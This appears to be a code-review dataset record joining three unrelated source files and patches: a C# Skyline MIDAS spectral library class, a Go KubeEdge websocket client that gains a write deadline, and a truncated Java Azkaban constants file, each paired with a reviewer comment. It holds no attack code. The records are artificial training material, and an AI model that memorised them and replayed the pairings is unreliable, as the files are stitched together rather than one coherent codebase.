using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Threading;
using System.Xml;
using System.Xml.Serialization;
using pwiz.Common.Collections;
using pwiz.Common.Database.NHibernate;
using pwiz.Common.SystemUtil;
using pwiz.ProteowizardWrapper;
using pwiz.Skyline.Model.DocSettings;
using pwiz.Skyline.Model.Results;
using pwiz.Skyline.Model.RetentionTimes;
using pwiz.Skyline.Properties;
using pwiz.Skyline.Util;
namespace pwiz.Skyline.Model.Lib.Midas
{
[XmlRoot("midas_library")]
public class MidasLibrary : Library
{
private const int SCHEMA_VERSION_CURRENT = 1;
private const double PRECURSOR_TOLERANCE_CHROM = 0.7;
private const double PRECURSOR_TOLERANCE = 0.001;
private const double RT_TOLERANCE = 0.001;
private int SchemaVersion { get; set; }
private string LibraryGuid { get; set; }
private Dictionary<DbResultsFile, List<DbSpectrum>> _spectra;
/// <summary>
/// A monotonically increasing revision number associated with this library.
/// </summary>
private float Revision { get; set; }
/// <summary>
/// Path to the file on disk from which this library was loaded. This value
/// may be null, if the library was deserialized from XML and has not yet
/// been loaded.
/// </summary>
public string FilePath { get; private set; }
public static MidasLibrary Load(MidasLibSpec spec, ILoadMonitor monitor)
{
var library = new MidasLibrary(spec);
return library.Load(monitor) ? library : null;
}
/// <summary>
/// Controlled access to this <see cref="Immutable"/> class, which should be
/// created through <see cref="Load(MidasLibSpec, ILoadMonitor)"/>.
/// </summary>
private MidasLibrary(LibrarySpec spec)
: base(spec)
{
FilePath = spec.FilePath;
}
protected override LibrarySpec CreateSpec()
{
return new MidasLibSpec(Name, FilePath);
}
public override string SpecFilter
{
get { return MidasLibSpec.FILTER_MIDAS; }
}
public override IList<RetentionTimeSource> ListRetentionTimeSources()
{
return new RetentionTimeSource[0];
//return _spectra.Where(kvp => kvp.Value.Any()).Select(kvp => new RetentionTimeSource(kvp.Key.BaseName, Name)).ToArray();
}
public override LibraryDetails LibraryDetails
{
get
{
return new LibraryDetails
{
Format = @"MIDAS",
Revision = Revision.ToString(LocalizationHelper.CurrentCulture),
SpectrumCount = 0,
DataFiles = LibraryFiles.FilePaths.Select(f => new SpectrumSourceFileDetails(f)).ToList()
};
}
}
public override LibraryFiles LibraryFiles
{
get
{
if (_spectra == null)
{
return new LibraryFiles();
}
else
{
return new LibraryFiles
{
FilePaths = _spectra.Keys.Select(key => key.FilePath).Distinct()
};
}
}
}
public override IPooledStream ReadStream { get { return null; } }
public override IEnumerable<IPooledStream> ReadStreams { get { yield break; }}
public override string IsNotLoadedExplained
{
get { return _spectra != null ? null : @"MIDAS: no dictionary"; }
}
public override bool IsSameLibrary(Library library)
{
var midasLib = library as MidasLibrary;
return midasLib != null && Equals(LibraryGuid, midasLib.LibraryGuid);
}
public override int CompareRevisions(Library library)
{
// Not a valid request, if the two libraries are not the same.
Debug.Assert(IsSameLibrary(library));
return Revision.CompareTo(((MidasLibrary) library).Revision);
}
public static string[] GetMissingFiles(SrmDocument document, IEnumerable<Library> libraries)
{
var results = document.Settings.MeasuredResults;
if (results == null)
return new string[0];
var midasFiles = results.MSDataFileInfos.Where(file => file.HasMidasSpectra).Select(file => file.FilePath.GetFilePath()).Distinct();
var libFiles = document.Settings.PeptideSettings.Libraries.MidasLibraries.SelectMany(lib => lib.ResultsFiles).Select(Path.GetFileName);
foreach (var lib in libraries.Where(lib => lib != null))
libFiles = libFiles.Concat(lib.LibraryFiles.FilePaths);
return midasFiles.Where(f => !libFiles.Contains(Path.GetFileName(f))).ToArray();
}
public static IEnumerable<ChromatogramSet> UnflagFiles(IEnumerable<ChromatogramSet> chromatograms, IEnumerable<string> filenames)
{
var arrFiles = new HashSet<string>(filenames);
if (!arrFiles.Any())
{
foreach (var chromSet in chromatograms)
yield return chromSet;
yield break;
}
foreach (var chromSet in chromatograms)
{
var infos = new List<ChromFileInfo>();
foreach (var info in chromSet.MSDataFileInfos)
{
var infoToAdd = info.HasMidasSpectra && arrFiles.Contains(info.FilePath.GetFileName())
? info.ChangeHasMidasSpectra(false)
: info;
infos.Add(infoToAdd);
}
yield return !ArrayUtil.ReferencesEqual(chromSet.MSDataFileInfos, infos)
? chromSet.ChangeMSDataFileInfos(infos)
: chromSet;
}
}
private static IEnumerable<double> ReadChromPrecursorsFromMsd(MsDataFileImpl msd, IProgressMonitor monitor)
{
for (var i = 0; i < msd.ChromatogramCount; i++)
{
if (monitor.IsCanceled)
yield break;
double? precursor = null;
try
{
int tmp;
var chromKey = ChromKey.FromId(msd.GetChromatogramId(i, out tmp), false);
precursor = chromKey.Precursor;
}
catch
{
// ignored
}
if (precursor.HasValue)
yield return precursor.Value;
}
}
private static IEnumerable<DbSpectrum> ReadDbSpectraFromMsd(MsDataFileImpl msd, IProgressMonitor monitor)
{
for (var i = 0; i < msd.SpectrumCount; i++)
{
if (monitor.IsCanceled)
yield break;
var spectrum = msd.GetSpectrum(i);
var ms1Precursors = spectrum.GetPrecursorsByMsLevel(1);
if (!ms1Precursors.Any())
continue;
var precursor = ms1Precursors.First();
yield return new DbSpectrum(new DbResultsFile(msd.FilePath), precursor.PrecursorMz.GetValueOrDefault(),
null, null, null, spectrum.RetentionTime.GetValueOrDefault(), spectrum.Mzs, spectrum.Intensities);
}
}
private static void MatchSpectraToChrom(List<DbSpectrum> dbSpectra, List<double> chromPrecursors, IProgressMonitor monitor)
{
chromPrecursors = chromPrecursors.Distinct().ToList();
chromPrecursors.Sort();
dbSpectra.Sort((x, y) => x.PrecursorMz.CompareTo(y.PrecursorMz));
for (int i = 0, j = 0; i < dbSpectra.Count; )
{
if (monitor.IsCanceled)
return;
var specPrecursor = dbSpectra[i].PrecursorMz;
var chromPrecursor = chromPrecursors[j];
var curDiff = Math.Abs(specPrecursor - chromPrecursor);
var nextDiff = chromPrecursors.Count > j + 1 ? Math.Abs(specPrecursor - chromPrecursors[j + 1]) : double.MaxValue;
if (curDiff < nextDiff)
{
if (curDiff <= PRECURSOR_TOLERANCE_CHROM)
dbSpectra[i].MatchedPrecursorMz = chromPrecursor;
i++;
}
else
{
j++;
}
}
}
private static void MatchSpectraToPeptides(IEnumerable<DbSpectrum> dbSpectra, SrmDocument doc, IProgressMonitor monitor)
{
var precursors = (from nodePepGroup in doc.PeptideGroups
from nodePep in nodePepGroup.Peptides
from nodeTranGroup in nodePep.TransitionGroups
select new Tuple<double, Target, int>(
nodeTranGroup.PrecursorMz,
doc.Settings.GetPrecursorCalc(nodeTranGroup.TransitionGroup.LabelType, nodePep.ExplicitMods).GetModifiedSequence(nodePep.Peptide.Target, false),
nodeTranGroup.PrecursorCharge
)).ToList();
if (!precursors.Any())
return;
precursors.Sort((x, y) => x.Item1.CompareTo(y.Item1));
foreach (var spectrum in dbSpectra)
{
if (spectrum == null || !spectrum.HasPrecursorMatch)
continue;
var precursor = spectrum.MatchedPrecursorMz.Value;
var j = CollectionUtil.BinarySearch(precursors, tuple => tuple.Item1.CompareTo(precursor), true);
if (j < 0)
{
j = ~j;
if (j == precursors.Count || (j > 0 && precursors[j].Item1 - precursor > precursor - precursors[j-1].Item1))
{
j--;
}
}
var closest = precursors[j];
if (Math.Abs(precursor - closest.Item1) < PRECURSOR_TOLERANCE)
{
spectrum.DocumentPeptide = closest.Item2.Sequence;
spectrum.DocumentPrecursorCharge = closest.Item3;
}
}
}
private bool Load(IProgressMonitor monitor)
{
_spectra = null;
if (FilePath == null)
return false;
var info = new FileInfo(FilePath);
if (!info.Exists || info.Length == 0)
return false;
var progress = new ProgressStatus(string.Empty).ChangeMessage(Resources.MidasLibrary_Load_Loading_MIDAS_library);
monitor.UpdateProgress(progress);
var spectra = new Dictionary<DbResultsFile, List<DbSpectrum>>();
try
{
using (var sessionFactory = SessionFactoryFactory.CreateSessionFactory(FilePath, typeof(MidasLibrary), false))
using (var session = new SessionWithLock(sessionFactory.OpenSession(), new ReaderWriterLock(), false))
{
var libInfo = session.CreateCriteria(typeof(DbLibInfo)).List<DbLibInfo>();
if (libInfo.Count != 1)
throw new Exception(Resources.MidasLibrary_Load_Error_reading_LibInfo_from_MIDAS_library);
SchemaVersion = libInfo[0].SchemaVersion;
LibraryGuid = libInfo[0].Guid;
var readSpectra = session.CreateCriteria(typeof(DbSpectrum)).List<DbSpectrum>();
progress = progress.ChangeSegments(0, readSpectra.Count);
foreach (var spectrum in readSpectra)
{
if (monitor.IsCanceled)
{
monitor.UpdateProgress(progress.Cancel());
return false;
}
progress = progress.NextSegment();
monitor.UpdateProgress(progress);
List<DbSpectrum> list;
if (!spectra.TryGetValue(spectrum.ResultsFile, out list))
{
list = new List<DbSpectrum>();
spectra[spectrum.ResultsFile] = list;
}
list.Add(spectrum);
}
}
}
catch
{
monitor.UpdateProgress(progress.Cancel());
return false;
}
_spectra = spectra;
monitor.UpdateProgress(progress.Complete());
return true;
}
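// Illustrative sketch (not part of the original file): instead of the bare catch added
// around the FileInfo constructor in the proposed patch, the failure reason could be
// surfaced through the progress monitor so the user can see why the library did not load.
// The exception types listed are the documented ones FileInfo can throw for a bad path.
//
//   FileInfo info;
//   try
//   {
//       info = new FileInfo(FilePath);
//   }
//   catch (Exception e) when (e is ArgumentException || e is PathTooLongException || e is NotSupportedException)
//   {
//       monitor.UpdateProgress(new ProgressStatus(string.Empty).ChangeErrorException(e));
//       return false;
//   }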
public IEnumerable<DbSpectrum> GetSpectraByFile(MsDataFileUri file)
{
return IsLoaded
? _spectra.Where(kvp => file == null || Equals(kvp.Key.FileName, file.GetFileName())).SelectMany(kvp => kvp.Value)
: new DbSpectrum[0];
}
public IEnumerable<DbSpectrum> GetSpectraByPrecursor(MsDataFileUri file, double precursor)
{
return GetSpectraByFile(file).Where(spectrum =>
spectrum.HasPrecursorMatch && Math.Abs(spectrum.MatchedPrecursorMz.GetValueOrDefault() - precursor) <= PRECURSOR_TOLERANCE);
}
public IEnumerable<DbSpectrum> GetSpectraByRetentionTime(MsDataFileUri file, double precursor, double rtMin, double rtMax)
{
var min = rtMin - RT_TOLERANCE;
var max = rtMax + RT_TOLERANCE;
return GetSpectraByPrecursor(file, precursor).Where(spectrum =>
min <= spectrum.RetentionTime && spectrum.RetentionTime <= max);
}
public IEnumerable<DbSpectrum> GetSpectraByPeptide(MsDataFileUri file, LibKey libKey)
{
foreach (var spectrum in GetSpectraByFile(file))
{
if (string.IsNullOrWhiteSpace(spectrum.DocumentPeptide))
{
continue;
}
var key = new PeptideLibraryKey(spectrum.DocumentPeptide,
spectrum.DocumentPrecursorCharge.GetValueOrDefault());
if (LibKeyIndex.KeysMatch(libKey.LibraryKey, key))
{
yield return spectrum;
}
}
}
public override bool Contains(LibKey key)
{
if (!key.IsPrecursorKey)
return GetSpectraByPeptide(null, key).Any();
var spectra = GetSpectraByPrecursor(null, key.PrecursorMz.GetValueOrDefault());
var keyRt = key.RetentionTime;
return !keyRt.HasValue ? spectra.Any() : spectra.Any(s => Equals(keyRt.Value, s.RetentionTime));
}
public override bool ContainsAny(Target target)
{
var key = new PeptideLibraryKey(target.Sequence, 0);
return _spectra.SelectMany(fileSpectra => fileSpectra.Value)
.Any(spectrum => null != spectrum.DocumentPeptide && key.UnmodifiedSequence ==
new PeptideLibraryKey(spectrum.DocumentPeptide, 0).UnmodifiedSequence);
}
public override bool TryGetLibInfo(LibKey key, out SpectrumHeaderInfo libInfo)
{
libInfo = Contains(key) ? new BiblioSpecSpectrumHeaderInfo(Name, 1, null, null) : null;
return libInfo != null;
}
public override bool TryLoadSpectrum(LibKey key, out SpectrumPeaksInfo spectrum)
{
spectrum = null;
DbSpectrum[] spectra;
if (!key.IsPrecursorKey)
{
spectra = GetSpectraByPeptide(null, key).ToArray();
}
else
{
spectra = GetSpectraByPrecursor(null, key.PrecursorMz.GetValueOrDefault()).ToArray();
var keyRt = key.RetentionTime;
if (keyRt.HasValue)
spectra = spectra.Where(s => Equals(keyRt.Value, s.RetentionTime)).ToArray();
}
if (!spectra.Any())
return false;
var spec = spectra.First();
var mi = spec.Mzs.Select((t, i) => new SpectrumPeaksInfo.MI { Mz = spec.Mzs[i], Intensity = (float)spec.Intensities[i] }); // CONSIDER(bspratt): annotation?
spectrum = new SpectrumPeaksInfo(mi.ToArray());
return true;
}
public override SpectrumPeaksInfo LoadSpectrum(object spectrumKey)
{
var spec = spectrumKey as DbSpectrum;
if (spec == null)
return null;
var mi = spec.Mzs.Select((t, i) => new SpectrumPeaksInfo.MI { Mz = spec.Mzs[i], Intensity = (float)spec.Intensities[i] }); // CONSIDER(bspratt): annotation?
return new SpectrumPeaksInfo(mi.ToArray());
}
public override bool TryGetRetentionTimes(LibKey key, MsDataFileUri filePath, out double[] retentionTimes)
{
retentionTimes = null;
DbSpectrum[] spectra;
if (!key.IsPrecursorKey)
{
spectra = GetSpectraByPeptide(filePath, key).ToArray();
}
else
{
spectra = GetSpectraByPrecursor(filePath, key.PrecursorMz.GetValueOrDefault()).ToArray();
var keyRt = key.RetentionTime;
if (keyRt.HasValue)
spectra = spectra.Where(s => Equals(keyRt.Value, s.RetentionTime)).ToArray();
}
if (!spectra.Any())
return false;
retentionTimes = spectra.Select(s => s.RetentionTime).ToArray();
return true;
}
public override bool TryGetRetentionTimes(MsDataFileUri filePath, out LibraryRetentionTimes retentionTimes)
{
retentionTimes = null;
return false;
}
public override bool TryGetRetentionTimes(int fileIndex, out LibraryRetentionTimes retentionTimes)
{
retentionTimes = null;
return false;
}
public override bool TryGetIrts(out LibraryRetentionTimes retentionTimes)
{
retentionTimes = null;
return false;
}
public override bool TryGetIonMobilityInfos(LibKey key, MsDataFileUri filePath, out IonMobilityAndCCS[] ionMobilities)
{
ionMobilities = null;
return false;
}
public override bool TryGetIonMobilityInfos(LibKey[] targetIons, MsDataFileUri filePath, out LibraryIonMobilityInfo ionMobilities)
{
ionMobilities = null;
return false;
}
public override bool TryGetIonMobilityInfos(LibKey[] targetIons, int fileIndex, out LibraryIonMobilityInfo ionMobilities)
{
ionMobilities = null;
return false;
}
public override bool TryGetIonMobilityInfos(LibKey[] targetIons, out LibraryIonMobilityInfo ionMobilities)
{
ionMobilities = null;
return false;
}
public override IEnumerable<SpectrumInfoLibrary> GetSpectra(LibKey key, IsotopeLabelType labelType, LibraryRedundancy redundancy)
{
if (redundancy == LibraryRedundancy.best)
yield break;
if (!key.IsPrecursorKey)
{
foreach (var spectrum in GetSpectraByPeptide(null, key))
yield return new SpectrumInfoLibrary(this, labelType, spectrum.ResultsFile.FilePath, spectrum.RetentionTime, null, false, spectrum);
yield break;
}
var keyRt = key.RetentionTime;
foreach (var spectrum in GetSpectraByPrecursor(null, key.PrecursorMz.GetValueOrDefault()))
if (!keyRt.HasValue || Equals(keyRt.Value, spectrum.RetentionTime))
yield return new SpectrumInfoLibrary(this, labelType, spectrum.ResultsFile.FilePath, spectrum.RetentionTime, null, false, spectrum);
}
public override int? FileCount { get { return IsLoaded ? _spectra.Keys.Count : 0; } }
public override int SpectrumCount { get { return IsLoaded ? _spectra.Sum(s => s.Value.Count(s2 => s2.HasPrecursorMatch)) : 0; } }
public override IEnumerable<LibKey> Keys
{
get
{
if (!IsLoaded)
yield break;
foreach (var spectrum in _spectra.Values.SelectMany(s => s).Where(s => s.HasPrecursorMatch))
yield return new LibKey(spectrum.MatchedPrecursorMz.GetValueOrDefault(), spectrum.RetentionTime);
}
}
public IEnumerable<string> ResultsFiles
{
get
{
if (_spectra == null)
yield break;
foreach (var key in _spectra.Keys)
yield return key.FilePath;
}
}
#region Implementation of IXmlSerializable
/// <summary>
/// For serialization
/// </summary>
private MidasLibrary()
{
}
private enum ATTR
{
// lsid, old version has no unique identifier
revision
}
public static MidasLibrary Deserialize(XmlReader reader)
{
return reader.Deserialize(new MidasLibrary());
}
public override void ReadXml(XmlReader reader)
{
// Read tag attributes
base.ReadXml(reader);
Revision = reader.GetFloatAttribute(ATTR.revision, 0);
// Consume tag
reader.Read();
}
public override void WriteXml(XmlWriter writer)
{
// Write tag attributes
base.WriteXml(writer);
writer.WriteAttribute(ATTR.revision, Revision);
}
#endregion
#region object overrides
public bool Equals(MidasLibrary obj)
{
if (ReferenceEquals(null, obj)) return false;
if (ReferenceEquals(this, obj)) return true;
return base.Equals(obj) && obj.Revision == Revision && Equals(obj.FilePath, FilePath);
}
public override bool Equals(object obj)
{
return !ReferenceEquals(null, obj) && (ReferenceEquals(this, obj) || Equals(obj as MidasLibrary));
}
public override int GetHashCode()
{
unchecked
{
var result = base.GetHashCode();
result = (result*397) ^ Revision.GetHashCode();
result = (result*397) ^ (FilePath != null ? FilePath.GetHashCode() : 0);
return result;
}
}
#endregion
public static MidasLibrary Create(LibrarySpec libSpec)
{
using (var sessionFactory = SessionFactoryFactory.CreateSessionFactory(libSpec.FilePath, typeof(MidasLibrary), true))
using (var session = new SessionWithLock(sessionFactory.OpenSession(), new ReaderWriterLock(), true))
using (var transaction = session.BeginTransaction())
{
session.Save(new DbLibInfo {SchemaVersion = SCHEMA_VERSION_CURRENT, Guid = Guid.NewGuid().ToString()});
transaction.Commit();
return new MidasLibrary(libSpec);
}
}
public static void AddSpectra(MidasLibSpec libSpec, MsDataFilePath[] resultsFiles, SrmDocument doc, ILoadMonitor monitor, out List<MsDataFilePath> failedFiles)
{
// Get spectra from results files
var newSpectra = new List<DbSpectrum>();
var progress = new ProgressStatus(string.Empty).ChangeMessage(Resources.MidasLibrary_AddSpectra_Reading_MIDAS_spectra);
const int percentResultsFiles = 80;
failedFiles = new List<MsDataFilePath>();
for (var i = 0; i < resultsFiles.Length; i++)
{
var resultsFile = resultsFiles[i];
try
{
monitor.UpdateProgress(progress.ChangePercentComplete(i*percentResultsFiles/resultsFiles.Length));
var filePath = resultsFile.GetFilePath();
if (File.Exists(filePath))
{
var sampleIndex = resultsFile.GetSampleIndex();
using (var msd = new MsDataFileImpl(filePath, sampleIndex == -1 ? 0 : sampleIndex, resultsFile.GetLockMassParameters(), requireVendorCentroidedMS2: true))
{
if (ChromatogramDataProvider.HasChromatogramData(msd) && SpectraChromDataProvider.HasSpectrumData(msd))
{
var chromPrecursors = ReadChromPrecursorsFromMsd(msd, monitor).ToList();
newSpectra.AddRange(ReadDbSpectraFromMsd(msd, monitor));
MatchSpectraToChrom(newSpectra, chromPrecursors, monitor);
}
}
MatchSpectraToPeptides(newSpectra, doc, monitor);
}
else
{
failedFiles.Add(resultsFile);
}
}
catch (Exception x)
{
monitor.UpdateProgress(progress.ChangeErrorException(x));
failedFiles.Add(resultsFile);
}
if (monitor.IsCanceled)
{
monitor.UpdateProgress(progress.Cancel());
return;
}
}
if (!newSpectra.Any())
{
monitor.UpdateProgress(progress.Complete());
return;
}
progress = progress.ChangePercentComplete(percentResultsFiles);
monitor.UpdateProgress(progress);
// Add spectra to library
var midasLib = !File.Exists(libSpec.FilePath) ? Create(libSpec) : Load(libSpec, monitor);
if (midasLib == null)
{
monitor.UpdateProgress(progress.ChangeErrorException(new Exception(Resources.MidasLibrary_AddSpectra_Error_loading_MIDAS_library_for_adding_spectra_)));
return;
}
progress = progress.ChangeMessage(Resources.MidasLibrary_AddSpectra_Adding_spectra_to_MIDAS_library);
monitor.UpdateProgress(progress);
var results = new Dictionary<string, DbResultsFile>();
if (midasLib._spectra != null)
{
foreach (var kvp in midasLib._spectra)
results[kvp.Key.FilePath] = kvp.Key;
}
using (var sessionFactory = SessionFactoryFactory.CreateSessionFactory(libSpec.FilePath, typeof(MidasLibrary), false))
using (var session = new SessionWithLock(sessionFactory.OpenSession(), new ReaderWriterLock(), true))
using (var transaction = session.BeginTransaction())
{
for (var i = 0; i < newSpectra.Count; i++)
{
if (monitor.IsCanceled)
{
transaction.Rollback();
monitor.UpdateProgress(progress.Cancel());
return;
}
var spectrum = newSpectra[i];
monitor.UpdateProgress(progress.ChangePercentComplete(percentResultsFiles + (int) (100.0*i/newSpectra.Count)));
DbResultsFile resultsFile;
if (!results.TryGetValue(spectrum.ResultsFile.FilePath, out resultsFile))
{
resultsFile = new DbResultsFile(spectrum.ResultsFile) { Id = null };
results[spectrum.ResultsFile.FilePath] = resultsFile;
session.SaveOrUpdate(resultsFile);
}
else if (midasLib._spectra != null)
{
List<DbSpectrum> existingSpectra;
if (midasLib._spectra.TryGetValue(resultsFile, out existingSpectra) &&
existingSpectra.Any(x => Equals(x.ResultsFile.FilePath, spectrum.ResultsFile.FilePath) &&
Equals(x.PrecursorMz, spectrum.PrecursorMz) &&
Equals(x.RetentionTime, spectrum.RetentionTime)))
{
// This spectrum already exists in the library
continue;
}
}
var spectrumNewDisconnected = new DbSpectrum(spectrum) {Id = null, ResultsFile = resultsFile};
session.SaveOrUpdate(spectrumNewDisconnected);
}
transaction.Commit();
monitor.UpdateProgress(progress.Complete());
}
}
public void RemoveResultsFiles(params string[] resultsFiles)
{
using (var sessionFactory = SessionFactoryFactory.CreateSessionFactory(FilePath, typeof(MidasLibrary), false))
using (var session = new SessionWithLock(sessionFactory.OpenSession(), new ReaderWriterLock(), true))
using (var transaction = session.BeginTransaction())
{
foreach (var kvp in _spectra)
{
if (resultsFiles.Contains(kvp.Key.FilePath))
{
foreach (var spectrum in kvp.Value)
session.Delete(spectrum);
session.Delete(kvp.Key);
}
}
transaction.Commit();
}
}
}
}
| 1 | 12,885 | How exactly are you expecting the user to see issues with their Midas library? It seems like all error information is being swallowed and not clearly reported to the user. Even if the eventual result is to report that loading the file failed, it seems like the exception, in this case, might have more information about why. | ProteoWizard-pwiz | .cs |
@@ -105,6 +105,10 @@ func (wsc *WebSocketClient) UnInit() {
//Send sends the message as JSON object through the connection
func (wsc *WebSocketClient) Send(message model.Message) error {
+ err := wsc.connection.SetWriteDeadline(time.Now().Add(wsc.config.WriteDeadline))
+ if err != nil {
+ return err
+ }
return wsc.connection.WriteMessageAsync(&message)
}
| 1 | package wsclient
import (
"crypto/tls"
"crypto/x509"
"errors"
"fmt"
"io/ioutil"
"net/http"
"time"
"k8s.io/klog/v2"
"github.com/kubeedge/beehive/pkg/core/model"
"github.com/kubeedge/kubeedge/edge/pkg/edgehub/config"
"github.com/kubeedge/viaduct/pkg/api"
wsclient "github.com/kubeedge/viaduct/pkg/client"
"github.com/kubeedge/viaduct/pkg/conn"
)
const (
retryCount = 5
cloudAccessSleep = 5 * time.Second
)
// WebSocketClient a websocket client
type WebSocketClient struct {
config *WebSocketConfig
connection conn.Connection
}
// WebSocketConfig config for websocket
type WebSocketConfig struct {
URL string
CertFilePath string
KeyFilePath string
HandshakeTimeout time.Duration
ReadDeadline time.Duration
WriteDeadline time.Duration
NodeID string
ProjectID string
}
// NewWebSocketClient initializes a new websocket client instance
func NewWebSocketClient(conf *WebSocketConfig) *WebSocketClient {
return &WebSocketClient{config: conf}
}
// Init initializes websocket client
func (wsc *WebSocketClient) Init() error {
klog.Infof("Websocket start to connect Access")
cert, err := tls.LoadX509KeyPair(wsc.config.CertFilePath, wsc.config.KeyFilePath)
if err != nil {
klog.Errorf("Failed to load x509 key pair: %v", err)
return fmt.Errorf("failed to load x509 key pair, error: %v", err)
}
caCert, err := ioutil.ReadFile(config.Config.TLSCAFile)
if err != nil {
return err
}
pool := x509.NewCertPool()
if ok := pool.AppendCertsFromPEM(caCert); !ok {
return fmt.Errorf("cannot parse the certificates")
}
tlsConfig := &tls.Config{
RootCAs: pool,
Certificates: []tls.Certificate{cert},
InsecureSkipVerify: false,
}
option := wsclient.Options{
HandshakeTimeout: wsc.config.HandshakeTimeout,
TLSConfig: tlsConfig,
Type: api.ProtocolTypeWS,
Addr: wsc.config.URL,
AutoRoute: false,
ConnUse: api.UseTypeMessage,
}
exOpts := api.WSClientOption{Header: make(http.Header)}
exOpts.Header.Set("node_id", wsc.config.NodeID)
exOpts.Header.Set("project_id", wsc.config.ProjectID)
client := &wsclient.Client{Options: option, ExOpts: exOpts}
for i := 0; i < retryCount; i++ {
connection, err := client.Connect()
if err != nil {
klog.Errorf("Init websocket connection failed %s", err.Error())
} else {
wsc.connection = connection
klog.Infof("Websocket connect to cloud access successful")
return nil
}
time.Sleep(cloudAccessSleep)
}
return errors.New("max retry count reached when connecting to cloud")
}
//UnInit closes the websocket connection
func (wsc *WebSocketClient) UnInit() {
wsc.connection.Close()
}
//Send sends the message as JSON object through the connection
func (wsc *WebSocketClient) Send(message model.Message) error {
return wsc.connection.WriteMessageAsync(&message)
}
//Receive reads the binary message through the connection
func (wsc *WebSocketClient) Receive() (model.Message, error) {
message := model.Message{}
err := wsc.connection.ReadMessage(&message)
return message, err
}
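// Illustrative sketch (not part of the original file): the patch above adds a write
// deadline in Send; a matching read deadline could be set here, assuming the viaduct
// connection exposes SetReadDeadline alongside the SetWriteDeadline used in the patch.
//
//	func (wsc *WebSocketClient) Receive() (model.Message, error) {
//		message := model.Message{}
//		if err := wsc.connection.SetReadDeadline(time.Now().Add(wsc.config.ReadDeadline)); err != nil {
//			return message, err
//		}
//		err := wsc.connection.ReadMessage(&message)
//		return message, err
//	}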
//Notify logs info
func (wsc *WebSocketClient) Notify(authInfo map[string]string) {
klog.Infof("no op")
}
| 1 | 20,105 | Looks good, but it seems `ReadMessage` doesn't use this Deadline in the underlying `WSConnection`? | kubeedge-kubeedge | go |
@@ -89,6 +89,8 @@ public class Constants {
// The flow exec id for a flow trigger instance unable to trigger a flow yet
public static final int FAILED_EXEC_ID = -2;
+ // Name of the file which keeps project directory size
+ public static final String PROJECT_DIR_SIZE_FILE_NAME = "_azkaban_project_dir_size_in_bytes_";
public static class ConfigurationKeys {
| 1 | /*
* Copyright 2018 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package azkaban;
import java.time.Duration;
/**
* Constants used in configuration files or shared among classes.
*
* <p>Conventions:
*
* <p>Internal constants to be put in the {@link Constants} class
*
* <p>Configuration keys to be put in the {@link ConfigurationKeys} class
*
* <p>Flow level properties keys to be put in the {@link FlowProperties} class
*
* <p>Job level Properties keys to be put in the {@link JobProperties} class
*
* <p>Use '.' to separate name spaces and '_" to separate words in the same namespace. e.g.
* azkaban.job.some_key</p>
*/
public class Constants {
// Azkaban Flow Versions
public static final double DEFAULT_AZKABAN_FLOW_VERSION = 1.0;
public static final double AZKABAN_FLOW_VERSION_2_0 = 2.0;
// Flow 2.0 file suffix
public static final String PROJECT_FILE_SUFFIX = ".project";
public static final String FLOW_FILE_SUFFIX = ".flow";
// Flow 2.0 node type
public static final String NODE_TYPE = "type";
public static final String FLOW_NODE_TYPE = "flow";
// Flow 2.0 flow and job path delimiter
public static final String PATH_DELIMITER = ":";
// Job properties override suffix
public static final String JOB_OVERRIDE_SUFFIX = ".jor";
// Names and paths of various file names to configure Azkaban
public static final String AZKABAN_PROPERTIES_FILE = "azkaban.properties";
public static final String AZKABAN_PRIVATE_PROPERTIES_FILE = "azkaban.private.properties";
public static final String DEFAULT_CONF_PATH = "conf";
public static final String AZKABAN_EXECUTOR_PORT_FILENAME = "executor.port";
public static final String AZKABAN_EXECUTOR_PORT_FILE = "executor.portfile";
public static final String AZKABAN_SERVLET_CONTEXT_KEY = "azkaban_app";
// Internal username used to perform SLA action
public static final String AZKABAN_SLA_CHECKER_USERNAME = "azkaban_sla";
// Memory check retry interval when OOM in ms
public static final long MEMORY_CHECK_INTERVAL_MS = 1000 * 60 * 1;
// Max number of memory check retry
public static final int MEMORY_CHECK_RETRY_LIMIT = 720;
public static final int DEFAULT_PORT_NUMBER = 8081;
public static final int DEFAULT_SSL_PORT_NUMBER = 8443;
public static final int DEFAULT_JETTY_MAX_THREAD_COUNT = 20;
// One Schedule's default End Time: 01/01/2050, 00:00:00, UTC
public static final long DEFAULT_SCHEDULE_END_EPOCH_TIME = 2524608000000L;
// Default flow trigger max wait time
public static final Duration DEFAULT_FLOW_TRIGGER_MAX_WAIT_TIME = Duration.ofDays(10);
public static final Duration MIN_FLOW_TRIGGER_WAIT_TIME = Duration.ofMinutes(1);
// The flow exec id for a flow trigger instance which hasn't started a flow yet
public static final int UNASSIGNED_EXEC_ID = -1;
// The flow exec id for a flow trigger instance unable to trigger a flow yet
public static final int FAILED_EXEC_ID = -2;
public static class ConfigurationKeys {
// Configures Azkaban Flow Version in project YAML file
public static final String AZKABAN_FLOW_VERSION = "azkaban-flow-version";
// These properties are configurable through azkaban.properties
public static final String AZKABAN_PID_FILENAME = "azkaban.pid.filename";
// Defines a list of external links, each referred to as a topic
public static final String AZKABAN_SERVER_EXTERNAL_TOPICS = "azkaban.server.external.topics";
// External URL template of a given topic, specified in the list defined above
public static final String AZKABAN_SERVER_EXTERNAL_TOPIC_URL = "azkaban.server.external.${topic}.url";
// Designates one of the external link topics to correspond to an execution analyzer
public static final String AZKABAN_SERVER_EXTERNAL_ANALYZER_TOPIC = "azkaban.server.external.analyzer.topic";
public static final String AZKABAN_SERVER_EXTERNAL_ANALYZER_LABEL = "azkaban.server.external.analyzer.label";
// Designates one of the external link topics to correspond to a job log viewer
public static final String AZKABAN_SERVER_EXTERNAL_LOGVIEWER_TOPIC = "azkaban.server.external.logviewer.topic";
public static final String AZKABAN_SERVER_EXTERNAL_LOGVIEWER_LABEL = "azkaban.server.external.logviewer.label";
/*
* Hadoop/Spark user job link.
* Example:
* a) azkaban.server.external.resource_manager_job_url=http://***rm***:8088/cluster/app/application_${application.id}
* b) azkaban.server.external.history_server_job_url=http://***jh***:19888/jobhistory/job/job_${application.id}
* c) azkaban.server.external.spark_history_server_job_url=http://***sh***:18080/history/application_${application.id}/1/jobs
* */
